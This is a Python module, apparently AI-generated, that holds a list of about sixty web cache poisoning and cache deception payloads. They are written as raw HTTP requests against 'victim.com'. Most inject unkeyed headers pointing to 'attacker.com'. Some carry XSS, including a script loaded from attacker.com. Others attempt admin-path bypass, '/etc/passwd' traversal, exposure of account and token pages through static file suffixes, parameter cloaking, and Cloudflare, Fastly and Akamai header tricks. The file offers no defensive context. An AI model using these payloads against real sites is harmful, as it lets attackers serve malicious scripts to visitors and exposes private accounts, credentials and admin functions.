"""cache_poisoning_payloads — generated dev-time by Claude. Webapp module asset.
"""

CACHE_POISONING_PAYLOADS = [{'technique': 'unkeyed_header_x_forwarded_host',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_forwarded_host_js',
  'payload': 'GET /static/app.js HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             'X-Forwarded-Host: attacker.com"><script>alert(1)</script>',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_original_url',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-Original-URL: /admin',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_rewrite_url',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-Rewrite-URL: /admin/config',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_forwarded_scheme',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-Forwarded-Scheme: nothttps\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_host',
  'payload': 'GET /home HTTP/1.1\r\nHost: victim.com\r\nX-Host: attacker.com',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_forwarded_host_import',
  'payload': 'GET /index.html HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             'X-Forwarded-Host: attacker.com</script><script src=//attacker.com/x.js>',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_forwarded',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nForwarded: host=attacker.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'unkeyed_header_x_original_host',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-Original-Host: attacker.com',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_forwarded_host_open_redirect',
  'payload': 'GET /redirect HTTP/1.1\r\nHost: victim.com\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_http_host_override',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-HTTP-Host-Override: attacker.com',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_forwarded_host_csrf_token',
  'payload': 'GET /login HTTP/1.1\r\nHost: victim.com\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_original_url_path_traversal',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-Original-URL: /../../etc/passwd',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_forwarded_server',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-Forwarded-Server: attacker.com',
  'cache_tier': 'reverse_proxy',
  'severity': 'MEDIUM'},
 {'technique': 'unkeyed_header_x_custom_ip_authorization',
  'payload': 'GET /internal HTTP/1.1\r\nHost: victim.com\r\nX-Custom-IP-Authorization: 127.0.0.1',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_forwarded_host_base_tag',
  'payload': 'GET /page HTTP/1.1\r\nHost: victim.com\r\nX-Forwarded-Host: attacker.com"><base href=//attacker.com/>',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_original_url_admin_bypass',
  'payload': 'GET /public HTTP/1.1\r\nHost: victim.com\r\nX-Original-URL: /admin/users',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_forwarded_host_script_injection',
  'payload': 'GET /cdn-cgi/trace HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             'X-Forwarded-Host: "><img src=x onerror=alert(document.domain)>',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_original_url_config_exposure',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-Original-URL: /config.json',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'unkeyed_header_x_forwarded_host_json_hijack',
  'payload': 'GET /api/user HTTP/1.1\r\nHost: victim.com\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_css_suffix',
  'payload': 'GET /account/profile.css HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_js_suffix',
  'payload': 'GET /account/settings.js HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_png_suffix',
  'payload': 'GET /account/avatar.png HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_gif_suffix',
  'payload': 'GET /user/dashboard/logo.gif HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'cache_deception_svg_suffix',
  'payload': 'GET /account/photo.svg HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_woff_suffix',
  'payload': 'GET /account/private.woff HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'cache_deception_ico_suffix',
  'payload': 'GET /api/user/info.ico HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_json_static_path',
  'payload': 'GET /account/tokens/static.css HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_trailing_slash_css',
  'payload': 'GET /profile/;x.css HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_path_confusion_css',
  'payload': 'GET /account/orders%2F..%2F.css HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_dot_segment_css',
  'payload': 'GET /account/./style.css HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_double_extension',
  'payload': 'GET /account/data.json.css HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_api_key_exposure',
  'payload': 'GET /api/v1/keys/cache.css HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_session_token_suffix',
  'payload': 'GET /account/tokens/logo.png HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cache_deception_txt_suffix',
  'payload': 'GET /account/private-keys.txt HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'parameter_cloaking_utm_source',
  'payload': 'GET /search?q=legit&utm_source=x%26q=malicious HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'parameter_cloaking_utm_content',
  'payload': 'GET /home?utm_content=a%26cb=attacker.com HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'parameter_cloaking_utm_medium_delimiter',
  'payload': 'GET /page?utm_medium=email%3bcallback=//attacker.com HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'parameter_cloaking_utm_campaign_fat_get',
  'payload': 'GET /search?utm_campaign=legit HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             'Content-Type: application/x-www-form-urlencoded\r\n'
             '\r\n'
             'q=<script>alert(1)</script>',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'parameter_cloaking_duplicate_param',
  'payload': 'GET /search?q=safe&q=<script>alert(1)</script>&utm_source=newsletter HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'parameter_cloaking_utm_source_json',
  'payload': 'GET /api/data?utm_source=x%26format=json%26callback=attacker HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'parameter_cloaking_fat_get_override',
  'payload': 'GET /page?cb=https://victim.com&utm_source=test HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             '\r\n'
             'cb=https://attacker.com',
  'cache_tier': 'reverse_proxy',
  'severity': 'HIGH'},
 {'technique': 'parameter_cloaking_semicolon_delimiter',
  'payload': 'GET /resource?utm_source=email;redirect=//attacker.com HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'parameter_cloaking_hash_abuse',
  'payload': 'GET /page?utm_source=abc&lang=en HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'parameter_cloaking_encoded_ampersand',
  'payload': 'GET /search?utm_source=legit%26admin=true HTTP/1.1\r\nHost: victim.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cloudflare_cf_connecting_ip_unkeyed',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nCF-Connecting-IP: 127.0.0.1',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cloudflare_cf_worker_bypass',
  'payload': 'GET /api/admin HTTP/1.1\r\nHost: victim.com\r\nCF-Worker: bypass',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cloudflare_true_client_ip',
  'payload': 'GET /geoblock HTTP/1.1\r\nHost: victim.com\r\nTrue-Client-IP: 192.168.1.1',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cloudflare_cf_ipcountry_unkeyed',
  'payload': 'GET /geo-content HTTP/1.1\r\nHost: victim.com\r\nCF-IPCountry: US',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'cloudflare_cf_cache_status_manipulation',
  'payload': 'GET /static/bundle.js HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             'CF-Cache-Status: HIT\r\n'
             'X-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'cloudflare_cdn_loop_header',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nCDN-Loop: cloudflare\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'cloudflare_origin_cache_control_bypass',
  'payload': 'GET /private HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             'CF-Visitor: {"scheme":"https"}\r\n'
             'X-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'fastly_surrogate_key_poisoning',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nSurrogate-Key: injected-key\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'fastly_x_varnish_header_unkeyed',
  'payload': 'GET /content HTTP/1.1\r\nHost: victim.com\r\nX-Varnish: 12345\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'fastly_surrogate_control_override',
  'payload': 'GET /api/feed HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             'Surrogate-Control: max-age=3600\r\n'
             'X-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'fastly_fastly_client_ip_unkeyed',
  'payload': 'GET /restricted HTTP/1.1\r\nHost: victim.com\r\nFastly-Client-IP: 10.0.0.1',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'fastly_xft_header_injection',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nX-Forwarded-For: 1.2.3.4\r\nFastly-FF: victim.com!',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'akamai_akamai_origin_hop_header',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nAkamai-Origin-Hop: 1\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'akamai_true_client_ip_bypass',
  'payload': 'GET /internal-api HTTP/1.1\r\nHost: victim.com\r\nTrue-Client-IP: 127.0.0.1\r\nPragma: akamai-x-cache-on',
  'cache_tier': 'cdn',
  'severity': 'HIGH'},
 {'technique': 'akamai_pragma_debug_header',
  'payload': 'GET / HTTP/1.1\r\nHost: victim.com\r\nPragma: akamai-x-get-cache-key\r\nX-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'akamai_x_check_cacheable',
  'payload': 'GET /content HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             'Pragma: akamai-x-check-cacheable\r\n'
             'X-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'MEDIUM'},
 {'technique': 'akamai_edge_control_cache_maxage',
  'payload': 'GET /private/data HTTP/1.1\r\n'
             'Host: victim.com\r\n'
             'Edge-Control: max-age=86400\r\n'
             'X-Forwarded-Host: attacker.com',
  'cache_tier': 'cdn',
  'severity': 'HIGH'}]
